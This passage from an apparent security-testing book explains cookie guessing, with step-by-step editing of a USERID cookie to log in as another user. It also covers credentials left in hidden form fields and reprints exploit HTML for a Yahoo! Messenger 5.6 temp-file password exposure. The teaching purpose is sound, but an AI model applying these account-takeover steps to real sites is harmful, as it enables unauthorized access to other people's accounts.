< Day Day Up > |
Cookie GuessingMany websites use simple text files called cookies that are downloaded onto a client and used to track the activity of that user or to keep a person logged onto a website when he returns. Cookies often contain ID values that a malicious hacker could modify and guess a value to gain unauthorized access to an account. As an example, consider a fake website that requires users to log on before accessing the site. Figure 7-14 shows the logon page where people are required to register. Figure 7-14. Creating an AccountAfter registration, a cookie is downloaded onto the hard drive of the client. Opening the cookie shows the following text: USERID 162294 www.hackmynetwork.com/ 1536 691275136 30063334 3283149408 29661002 * AFFILIATION 0 www.hackmynetwork.com/ 1536 2082342272 29862168 3283149408 29661002 * Next, change the user ID to a new number. Usually, picking the previous number is sufficient: USERID 162293 www.hackmynetwork.com/ 1536 691275136 30063334 3283149408 29661002 * AFFILIATION 0 www.hackmynetwork.com/ 1536 2082342272 29862168 3283149408 29661002 * Close the browser and reopen the web page. The website looks at the cookie and logs you in automatically as that user. Figure 7-15 shows a user being automatically logged into a website with the account information of the user being shown. Figure 7-15. Cookie GuessingHidden FieldsWeb pages have the option of using hidden fields to hide information from those viewing a web page. Often, these hidden fields contain vital information such as usernames and passwords. The problem with hidden fields is that they really are not hidden at all; you just have to know where to look for them. Although the web browser might not show the fields, you can look at the source code of the web page to find them. All web browsers provide the capability to view source code, or you can download the website using a utility such as Wget and view the source code offline. A hidden field is found in forms that are often used when submitting usernames and passwords. Examine the following sample form: <FORM name=Authentication_Form action=http://www.hackmynetwork.com/login/ login?3fcn8a method=post> Username:<INPUT name=username value="admin" type=hidden>Password:<INPUT name=password value="letmein" type=hidden"> Just by examining this brief form code, you can discover two hidden fields called username and password. By looking at the values of these fields, you can see that the username is admin and the password is letmein. Most developers shy away from using hidden fields. Nevertheless, you should always look at the source code because it might reveal interesting hidden fields. A great example of using hidden fields to exploit a system is a technique discovered by Rafel Ivgi. He discovered a vulnerability with Yahoo! Messenger 5.6, in which a person could discover the username and password from a temp file on the computer of the user. When a user loads Yahoo! Messenger, a temporary HTML file is stored on his computer that contains his username and password. Example 7-14 shows the sample code to exploit this vulnerability. Example 7-14. Capturing Yahoo! Passwords<html> <head> <script> <!-- var username; username='<username>'; var password; password='<password>'; function submit () { document.getElementById('login').value=username; document.getElementById('passwd').value=password; document.getElementById('login_form').submit(); }; //--> </script> </head> <body onLoad='submit();'> <form method=post action="https://login.yahoo.com/config/login" autocomplete=off name=login_form id=login_form onsubmit="return alert(document.forms['login_form'].login.value)"> <input type="hidden" name=".tries" value="1"> <input type="hidden" name=".src" value="ym"> <input type="hidden" name=".md5" value=""> <input type="hidden" name=".hash" value=""> <input type="hidden" name=".js" value=""> <input type="hidden" name=".last" value="2"> <input type="hidden" name="promo" value=""> <input type="hidden" name=".intl" value="us"> <input type="hidden" name=".bypass" value=""> <input type="hidden" name=".partner" value=""> <input type="hidden" name=".v" value="0"> <input type="hidden" name=".yplus" value=""> <input type="hidden" name=".emailCode" value=""> <input type="hidden" name="plg" value=""> <input type="hidden" name="stepid" value=""> <input type="hidden" name=".ev" value=""> <input type="hidden" name="hasMsgr" value="0"> <input type="hidden" name=".chkP" value="Y"> <input type="hidden" name=".done" value="http://mail.yahoo.com"> <input type="hidden" name="login" size="17" value=""> <input type="hidden" name="passwd" size="17" maxlength="32"> <input type="hidden" name=".save" value="Sign In"> </form></body> </html> This demonstrates the danger of using hidden fields. Included in the HTML file is both the username and the password. This exploit requires local access to the computer, however, to retrieve the document in the TEMP directory of the user. Note that in Windows 2000 and Windows XP, this directory is secured with NTFS, but if you are logged on as that user or as a user who has administrative access, using an earlier operating system that does not use NTFS, or you have decided to use FAT instead of NTFS, you can access this file. |
< Day Day Up > |